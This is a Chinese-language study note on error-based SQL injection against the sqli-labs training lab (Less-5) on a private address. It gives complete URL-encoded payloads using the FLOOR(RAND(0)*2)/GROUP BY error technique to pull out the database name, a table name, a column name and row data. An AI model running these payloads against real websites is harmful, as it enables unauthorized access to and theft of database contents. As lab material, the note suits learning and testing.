sql注入學習筆記(二)報錯型

報錯型sql注入方法

1、判斷提交方式

字符型:

2、構造整合:

該出的整合方法爲  '

3、運用hackbar插件,可以得到要訪問的URL

庫名:security

點擊database會出現訪問數據庫的語句,將改語句複製粘貼至URL中,即可得到數據庫名。

URL語句:

http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+

表名:emails

同上點擊tables,輸入數據庫名稱得到訪問表名

URL語句:

http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(table_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+

列名:id

URL語句:

http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20%20%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(column_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name=0x656d61696c73%20AND%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+

數據:1

URL語句:

AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(id) AS CHAR),0x7e)) FROM security.emails LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章